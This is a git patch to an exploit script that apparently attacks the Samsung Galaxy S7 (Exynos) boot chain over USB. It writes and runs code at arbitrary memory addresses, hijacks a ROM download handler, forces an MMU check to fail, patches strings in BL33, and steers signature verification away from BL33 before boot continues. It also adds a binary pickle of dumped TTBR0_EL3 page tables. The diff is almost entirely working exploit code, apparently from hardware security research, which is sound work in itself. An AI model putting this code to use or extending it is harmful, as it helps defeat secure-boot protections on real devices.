From 0174b2a4f7b40b1b0b075293e789bd9176a79f3c Mon Sep 17 00:00:00 2001 From: Jonathan Herrewijnen Date: Tue, 24 Sep 2024 18:50:11 +0200 Subject: [PATCH] Boots patched BL33 --- source/exploit/exploit.py | 74 ++++++++++++++++++++++------------- source/exploit/ttbr0_el3.pkl | Bin 0 -> 4762 bytes 2 files changed, 47 insertions(+), 27 deletions(-) create mode 100644 source/exploit/ttbr0_el3.pkl diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py index 5846723..5eef337 100644 --- a/source/exploit/exploit.py +++ b/source/exploit/exploit.py @@ -599,7 +599,7 @@ class ExynosDevice(): assert ttbr0 == b"\x00" * 0x8, "TTBR0_EL3 not overwritten" - def test_write_execute(self, address): + def test_write_execute(self, address, execute=True): """ At given address, test if it is possible to write and execute code, by writing a simple jump to, and jump back. """ @@ -613,10 +613,11 @@ class ExynosDevice(): shellcode = ks.asm(shellcode, as_bytes=True)[0] self.cd.memwrite_region(address, shellcode) - self.cd.jump_to(address) - self.usb_write(b"PING") - assert self.usb_read(0x200) == b"PONG", "Failed to jump back to debugger" - print(f'Jumped to {hex(address)} and back') + if execute: + self.cd.jump_to(address) + self.usb_write(b"PING") + assert self.usb_read(0x200) == b"PONG", "Failed to jump back to debugger" + print(f'Jumped to {hex(address)} and back') def debugger_boot(self): @@ -654,15 +655,28 @@ class ExynosDevice(): self.connect_device() # Send boot stage 1 - self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read()) + bl1 = open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read() + self.send_normal_stage(bl1) assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" + # Dump contents of TTBR0_EL3 from memory into a pandas dataframe and write it to a pickle file + import pandas as pd + blub = self.cd.memdump_region(0x02035000, 0x1000) + try: + df = pd.read_pickle('ttbr0_el3.pkl') + # Concat data to existing dataframe + df = pd.concat([df, pd.Series([blub])], ignore_index=True) + except: + df = pd.DataFrame() + df['TTBR0_EL3'] = [blub] + df.to_pickle('ttbr0_el3.pkl') + # Setup jump and bl_auth AUTH_BL1 = 0x00012848 # Location of the authentication function - def auth_bl1(lr=0x2069000): + def auth_bl1(lr=0x2069000, x0=1, x1=1): # Load the firmware - self.cd.arch_dbg.state.X0 = 1 - self.cd.arch_dbg.state.X1 = 1 + self.cd.arch_dbg.state.X0 = x0 + self.cd.arch_dbg.state.X1 = x1 self.cd.arch_dbg.state.LR = lr #jump back to debugger when finished self.cd.restore_stack_and_jump(AUTH_BL1) assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" @@ -678,6 +692,9 @@ class ExynosDevice(): self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31 self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br")) + # Write a patch to BL1 in memory + # self.cd.memwrite_region(0x2021800+bl1.find(b'2015'), b'2014') + # Jump into BL1 (sboot.bin.1.bin) JUMP_BL1 = 0x000002c0 def jump_bl1(lr): @@ -719,7 +736,10 @@ class ExynosDevice(): TTBR0_EL3 = 0x02035600 # Zeroed out # Modifies/disables setting up MMU (but is set up eventually) -> MMU says 0x0 instead of 0x1, but still little access (and proper USB recovyer boot!?) - self.cd.memwrite_region(0x020244e8, struct.pack('>I', 0x1f0c00f1)) # Change check to always false + self.cd.memwrite_region(0x020244e8, struct.pack('>I', 0x1f0c00f1)) # Change check to always be false + + # DWC3 OTG update mode -> Might be useful at some point? + # self.cd.memwrite_region(0x02021580, struct.pack('>I', 0x00000000)) # Jump into BL31 and execute it self.cd.restore_stack_and_jump(0x02024010) @@ -748,15 +768,6 @@ class ExynosDevice(): # ==== Stage 4 BL2 ==== bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read() - - # Patching - # bl2 = len(bl2) - # patch_len = len(b"MNGS_QUAD") - # patch = b"Patch" + (b"\x00" * (patch_len - len(b"Patch"))) - # patch_offset = bl2.find(b"MNGS_QUAD") - # bl2 = bl2[:patch_offset] + patch + bl2[patch_len + patch_offset:] - # assert len(stage4) == stage4_len, "Invalid bl2 length" - self.send_normal_stage(bl2) time.sleep(2) self.connect_device() @@ -773,7 +784,7 @@ class ExynosDevice(): # Restore bootflow print(self.cd.arch_dbg.state.print_ctx()) - BL33_jump = self.cd.arch_dbg.state.X0 + BL33_ptr = self.cd.arch_dbg.state.X0 BL33_LR = self.cd.arch_dbg.state.LR self.cd.arch_dbg.state.LR = DEBUGGER_ADDR @@ -788,13 +799,22 @@ class ExynosDevice(): self.connect_device() self.usb_read(0x200) # GiAs - # Modify something in BL33 - # print(self.cd.memdump_region(0x8f063710, 0x8)) - # self.cd.memwrite_region(0x8f063710, struct.pack('>I', 0x53616d74)) - # self.cd.memdump_region(0x8f063710, 0x8) - - self.cd.arch_dbg.state.X0 = BL33_jump - self.cd.restore_stack_and_jump(BL33_LR) + print(self.cd.arch_dbg.state.print_ctx()) + + # Trying to patch BL33 but continuing good boot flow + # auth_bl1(DEBUGGER_ADDR, 0, 0) + + # # Modify something in BL33 + print(self.cd.memdump_region(0x8f063710, 0x8)) + # Samsung == SaMtung + self.cd.memwrite_region(0x8f063710, struct.pack('>I', 0x53614d74)) + + # Modify USB Recovyer mode string to something else + self.cd.memwrite_region(0x8f06ab10, b'\x50\x41\x54\x43\x48\x49\x4e\x47\x20\x42\x4c\x33\x33\x3a\x2d\x29\x0a\x00') + print(self.cd.memdump_region(0x8f063710, 0x8)) + + # Do signature verification on BL2 instead of BL33 and proceed to boot (original is jump to 0x2024eec) + self.cd.restore_stack_and_jump(0x02024e58) pass diff --git a/source/exploit/ttbr0_el3.pkl b/source/exploit/ttbr0_el3.pkl new file mode 100644 index 0000000000000000000000000000000000000000..23088c82aeca3b011e6840860c4812085b03f5ee GIT binary patch literal 4762 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 W{5~OQ7}yu$2J=PXAE7XAlK%%+C?$#j literal 0 HcmV?d00001